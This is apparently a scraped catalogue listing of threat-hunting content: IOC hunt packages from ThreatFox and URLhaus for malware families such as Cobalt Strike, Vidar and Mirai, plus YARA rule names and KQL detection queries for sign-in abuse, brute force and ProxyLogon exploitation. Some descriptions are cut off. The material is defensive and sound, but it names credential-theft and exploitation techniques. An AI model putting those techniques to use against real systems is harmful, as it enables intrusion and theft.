ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Mirai
ThreatFox: ClearFake IOCs
ioc-hunt high
DeviceFileEventsDnsEventsUrlClickEvents
Hunt package for 53 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DeviceFileEventsDnsEventsUrlClickEvents
Hunt package for 9 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 3 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 25 IOCs associated with Unknown malware
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 5 IOCs associated with Unknown Stealer
ThreatFox: Amadey IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with Amadey
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 8 IOCs associated with AsyncRAT
ThreatFox: Berbew IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 10 IOCs associated with Berbew
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 13 IOCs associated with Cobalt Strike
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Havoc
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 2 IOCs associated with Nanocore RAT
ThreatFox: PureLogs Stealer IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with PureLogs Stealer
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 6 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
DnsEvents
Hunt package for 7 IOCs associated with Remus
ThreatFox: ServHelper IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with ServHelper
ThreatFox: Tofsee IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 27 IOCs associated with Tofsee
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 34 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with VShell
ThreatFox: XTinyLoader IOCs
ioc-hunt high
DeviceFileEventsUrlClickEvents
Hunt package for 2 IOCs associated with XTinyLoader
URLhaus: 213-111-144-211-8443 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as 213-111-144-211-8443
URLhaus: 282234 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 282234
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 41 malicious URLs tagged as 32-bit
URLhaus: Amadey Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as Amadey
URLhaus: apk Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as apk
URLhaus: ascii Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as ascii
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as elf
URLhaus: exe Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as exe
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 21 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as Mozi
URLhaus: rat Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as rat
ThreatFox: Mirai IOCs
ioc-hunt high
DnsEvents
Hunt package for 10 IOCs associated with Mirai
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with RedTail
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 16 IOCs associated with ClearFake
ThreatFox: IClickFix IOCs
ioc-hunt high
DnsEvents
Hunt package for 44 IOCs associated with IClickFix
ThreatFox: KongTuke IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 9 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 9 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 29 IOCs associated with Unknown malware
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 68 IOCs associated with Unknown Stealer
ThreatFox: Unknown Webinject IOCs
ioc-hunt high
DnsEvents
The "Unknown Webinject" malware is designed to steal user credentials by injecting malicious scripts into legitimate websites during login processes. It typically arrives in environments through phishing emails or compromised websites that host the malicious domains. SOC analysts should look for unusual script injections in web traffic, unexpected credential exfiltration patterns, and
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 12 IOCs associated with Cobalt Strike
ThreatFox: GCleaner IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 14 IOCs associated with GCleaner
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Havoc
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DnsEvents
Nanocore RAT is
ThreatFox: NjRAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 6 IOCs associated with NjRAT
ThreatFox: PureLogs Stealer IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with PureLogs Stealer
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Quasar RAT is a remote access trojan that
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 18 IOCs associated with Remcos
ThreatFox: Socks5 Systemz IOCs
ioc-hunt high
DnsEvents
Hunt package for 8 IOCs associated with Socks5 Systemz
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 33 IOCs associated with Vidar
ThreatFox: XWorm IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 9 IOCs associated with XWorm
URLhaus: 141-98-10-98 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 141-98-10-98
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 39 malicious URLs tagged as 32-bit
URLhaus: ascii Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as ascii
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 13 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as elf
URLhaus: KongTuke Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as KongTuke
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 23 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as Mozi
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Kimwolf
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 3 IOCs associated with Mirai
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 2 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 83 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents
Hunt package for 10 IOCs associated with Unknown malware
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Unknown Stealer
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 10 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 21 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 8 IOCs associated with DCRat
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Havoc
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with Nanocore RAT
ThreatFox: PureRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 17 IOCs associated with PureRAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with Remcos
ThreatFox: Sliver IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Sliver
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with ValleyRAT
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 6 IOCs associated with VShell
URLhaus: 176-65-139-126 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as 176-65-139-126
URLhaus: 176-65-139-129 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as 176-65-139-129
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 27 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 44 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Mozi malware family is a backdoor that enables remote command execution and data exfiltration, often used for persistent access and lateral movement within compromised networks. It typically arrives via phishing emails or malicious websites, leveraging URLs and domains hosted on compromised or malicious infrastructure. SOC analysts
Linux/Onimiki malicious DNS server
yara low
Linux/Onimiki malicious DNS server
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 14 IOCs associated with Mirai
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 8 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 38 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 14 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 5 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents
Hunt package for 9 IOCs associated with Unknown malware
ThreatFox: Unknown RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Unknown RAT
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEvents
The "Unknown Stealer" malware is a data exfiltration tool designed to steal sensitive information such as credentials, browser data, and system configurations from infected hosts. It typically arrives via phishing emails containing malicious links or compromised domains that redirect users
ThreatFox: ACR Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with ACR Stealer
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with AsyncRAT
ThreatFox: CASTLELOADER IOCs
ioc-hunt high
DnsEvents
Hunt package for 6 IOCs associated with CASTLELOADER
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 22 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with DCRat
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Havoc
ThreatFox: HijackLoader IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with HijackLoader
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 8 IOCs associated with Lumma Stealer
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 8 IOCs associated with Nanocore RAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
DnsEvents
Hunt package for 4 IOCs associated with Remus
ThreatFox: SnappyClient IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with SnappyClient
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 14 IOCs associated with VShell
URLhaus: 176-65-148-144 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 176-65-148-144
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 54 malicious URLs tagged as 32-bit
URLhaus: 62-60-226-159 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 62-60-226-159
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 17 malicious URLs tagged as ClearFake
URLhaus: d52f85 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as d52f85
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 15 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as malware_download
Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ
Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ
Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ
Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ
YARA rule: apt_all_JavaScript_ScanboxFramework_obfuscated
dubseven dropper dialog remains
yara low
YARA rule: dubseven_dropper_dialog_remains
dubseven dropper registry checks
yara low
YARA rule: dubseven_dropper_registry_checks
dubseven file set
yara low
YARA rule: dubseven_file_set
maindll mutex
yara low
YARA rule: maindll_mutex
New domain added to Whitelist
kql medium
T1098
'This hunting query identifies new domains added to the domain login whitelist in Zoom.'
New time zone observed
kql medium
T1078
'This hunting query identifies users joining a meeting from a time zone that a user has not been observed from in the last 30 days.'
Detects a specific config file used by malware in RUAG APT case
Detects a config text file used by malware Cobra in RUAG case
The RUAG_Cobra_Malware YARA rule detects
Detects a config text file used in data exfiltration in RUAG case
Detects an embedded executable with a malformed header - known from Tavdig malware
SLServer campaign code
yara low
YARA rule: SLServer_campaign_code
SLServer command and control
yara low
YARA rule: SLServer_command_and_control
SLServer dialog remains
yara low
YARA rule: SLServer_dialog_remains
SLServer mutex
yara low
YARA rule: SLServer_mutex
SLServer unknown string
yara low
YARA rule: SLServer_unknown_string
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 29 IOCs associated with Mirai
ThreatFox: Mozi IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 19 IOCs associated with Mozi
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsUrlClickEvents
Hunt package for 13 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 58 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 3 IOCs associated with SmartApeSG
ThreatFox: AMOS IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents
Hunt package for 8 IOCs associated with AMOS
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 6 IOCs associated with Unknown malware
ThreatFox: Amadey IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 2 IOCs associated with Amadey
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 10 IOCs associated with Cobalt Strike
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Havoc
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 6 IOCs associated with Lumma Stealer
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with Nanocore RAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 8 IOCs associated with Remcos
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 2 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
UrlClickEvents
Vidar malware is a data exfiltration tool designed to steal credentials and sensitive information from compromised systems. It typically arrives via phishing emails or malicious websites, leveraging URLs to deliver payloads or establish command-and-control communication. SOC
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 16 IOCs associated with VShell
This sample was pulled from the bae systems snake campaign report. The Turla dropper creates a file in teh temp dir and registers an auto start service call \
URLhaus: 282234 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as 282234
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 37 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 16 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as elf
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as Mozi
URLhaus: sh Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The "sh" malware family is likely used for initial access and command-and-control (C2) communication, leveraging stolen credentials or exploit kits
Symantec Waterbug Attack - FA malware variant
Symantec Waterbug Attack - SAV Malware
Symantec Waterbug Attack - Trojan Turla DLL
Symantec Waterbug Attack - Trojan Turla Dropper
Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error
Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF
Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component
T1078.004
IdentityInfoSigninLogs
'Detects when a privileged user account successfully authenticates from to another Microsoft Entra ID Tenant. Authentication attempts should be investigated to ensure the activity was legitimate and
T1078
SigninLogs
'This query over Microsoft Entra ID sign-in activity highlights Microsoft Entra ID apps with an unusually high ratio of distinct geolocations versus total number of authentications'
T1078
SigninLogs
'This query examines Microsoft Entra ID sign-ins for each application and identifies the most anomalous change in a user's location profile. The goal is to detect user account compromise, possibly via
Anomalous sign-in location by user account and authenticating application - with sign-in details
kql medium
T1078
SigninLogs
'This query examines Microsoft Entra ID sign-ins and identifies anomalous changes in a user's location profile. A variation joins results back onto the original sign-in data to review the location set
Sofacy Malware - German Bundestag
yara high
Sofacy Malware - German Bundestag
T1071T1571
'Query identifies beaconing patterns from Wire Data logs. Uses KQL functions to calculate time delta and find beaconing percentage. Results of beaconing to untrusted public networks can be investigate
Disabled accounts using Squid proxy
kql medium
T1110
SigninLogsSyslog
'Query finds accounts recorded as disabled by AD in previous time period but still using proxy in current time period. Presumes default squid log format is used. http://www.squid-cache.org/Doc/config/
Exchange Server ProxyLogon URIs
kql medium
T1190
W3CIISLog
'This query will detect paths suspicious associated with ProxyLogon exploitation'
Exchange Server Suspicious URIs Visited
kql medium
T1190
W3CIISLog
'This query will detect paths suspicious associated with ProxyLogon exploitation, it will then calculate the percentage of suspicious URIs the user had visited in relation to the total number of URIs
Failed attempt to access Azure Portal
kql medium
T1078
SigninLogs
'Access attempts to Azure Portal from an unauthorized user. Either invalid password or the user account does not exist.'
Inactive or new account signins
kql medium
T1078
AuditLogsBehaviorAnalyticsSigninLogs
'Query for new sign-ins from stale/inactive accounts. UEBA filters based on ActivityInsights. Results for accounts created in the last 7 days are filtered out.'
Login attempt by Blocked MFA user
kql medium
T1078
BehaviorAnalyticsIdentityInfoSigninLogs
'An account could be blocked if there are too many failed authentication attempts in a row. This hunting query identifies if a MFA user account that is set to blocked tries to login to Microsoft Entra
Login spike with increase failure rate
kql medium
T1078
SigninLogs
'Query over SigninLogs summarizes login attempts per hour on weekdays. Kusto anomaly detection finds login spikes. Calculates percentage change between anomalous period and average logins. Determines
T1078T1078.004T1110T1110.004T1110.003
SigninLogs
'This hunting query will identify instances where a single user account has seen a high incidence of failed attempts from highly volatile IP addresses Changing IP address for every password attempt i
MFA Spamming
kql medium
T1078
SigninLogs
'Identifies list of user impacted by MFA Spamming within a given time window,Default Failure count is 10 with default Time Window is 5 minutes'
T1110
SigninLogs
'Highlights accounts associated with multiple authentications from different geographical locations in a short period of time.'
Multiple Entra ID Admins Removed
kql medium
T1531
AuditLogs
'Looks for multiple users that had their admin role removed by a single user within a certain period. The default threshold is 5 removals, this can be edited in the query.'
Potential IIS brute force
kql medium
T1110
W3CIISLog
'Query shows 1200+ failed attempts by cIP per hour on server, then successful logon. Only includes > 1 user agent string or port. Could indicate successful probing and brute force success on IIS serve
Potential IIS code injection attempt
kql medium
T1189T1190
W3CIISLog
'Potential code injection into web server roles via IIS logs scan. Represents attempt to gain initial access using drive-by compromise technique. Detection flags events for review and filtering of aut
T1068
'This query detects a process that runs under SYSTEM user's security context and was spawned by a process that was running under a lower security context indicating an exploitation for privilege escal
Potential Process Doppelganging
kql medium
T1055.013
SecurityEvent
'This query detects Process Doppelganging, a technique that calls several APIs related to NTFS transactions which allow to substitute the PE content before the process is even created. Ref: https://at
Rare User Agent strings
kql low
T1190
W3CIISLog
'This will check for Rare User Agent strings over the last 3 days. This can indicate potential probing of your IIS servers.'
T1053
SecurityEvent
'The query detects a scheduled task, created/updated remotely, using the Schtasks process. Threat actors are using scheduled tasks for establishing persistence and moving laterally through the networ
RID Hijacking
kql medium
T1078
SecurityEvent
'This query detects all authentication attempts of non administrator accounts that their RID is ending in *-500. Ref: https://stealthbits.com/blog/rid-hijacking-when-guests-become-admins/'
Same IP address with multiple csUserAgent
kql medium
T1190
W3CIISLog
'This alerts when a client IP connects with 1-15 different useragents in less than 1 hour. Limited to 50 or less connections to avoid high traffic. May indicate malicious activity as a probing method.
T1087T1021
SigninLogs
'This identifies when a user account successfully logs onto a given App and within 1 minute fails to logon to a different App. This may indicate a malicious attempt at accessing disallowed Apps for di
T1078T1098
SigninLogs
'Identifies IPs with failed attempts to sign in to one or more disabled accounts signed in successfully to another account. This analytic will additionally identify the successful signed in accounts a
SigninLogs
'Example query for SigninLogs showing how to break out packed fields. In this case extending conditional access Policies '
Smart Lockouts
kql medium
T1078.004
SigninLogs
'Identifies accounts that have been locked out by smart lockout policies. Review this results for patterns that might suggest that a password spray is triggering these smart lockout events. Ref : http
Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe
Spike in failed sign-in events
kql medium
T1078.004
SigninLogs
'Identifies spikes in failed sign-in events based on the volume of failed sign-in events over time. Use to identify patterns of suspicious behavior such as unusually high failed sign-in attempts from
The YARA rule 'StoneDrill_main_sub' detects decrypted StoneDrill malware samples, aiding in identifying active or recently decrypted instances of this ransom
Generic detection for samples that enumerate files with encrypted resource called 101
T1567
W3CIISLog
'The hunting query looks for suspicious files accessed on a IIS server that might indicate exfiltration hosting. This technique has been observed when exporting mailbox files from OWA servers.'
Suspected Brute force attack Investigation
kql medium
T1110
AADNonInteractiveUserSignInLogsSigninLogs
'Summarize all the failures and success events for all users in the last 24 hours, only identify users with more than 100 failures in the set period'
Suspected ProxyToken Exploitation
kql medium
T1190
W3CIISLog
'Looks for activity that might indicate exploitation of the ProxyToken vulnerability - CVE-2021-33766 Ref: https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-micro
T1218
SecurityEvent
'This query identifies Microsoft-signed Binaries and Scripts that are not system initiated. This technique is commonly used in phishing attacks'
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
The Mirai malware family compromises IoT devices by exploiting
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with RedTail
ThreatFox: Tsunami IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with Tsunami
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 33 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 9 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 3 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 55 IOCs associated with Unknown malware
ThreatFox: Unknown RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 7 IOCs associated with Unknown RAT
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEvents
The "Unknown Stealer" malware is designed to exfiltrate sensitive data, including credentials and system information, from infected hosts. It typically arrives via phishing emails containing malicious links or attachments that deploy the payload through compromised domains. SOC analysts should monitor for unusual outbound traffic to the associated domains, anomalous credential access attempts
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 5 IOCs associated with AsyncRAT
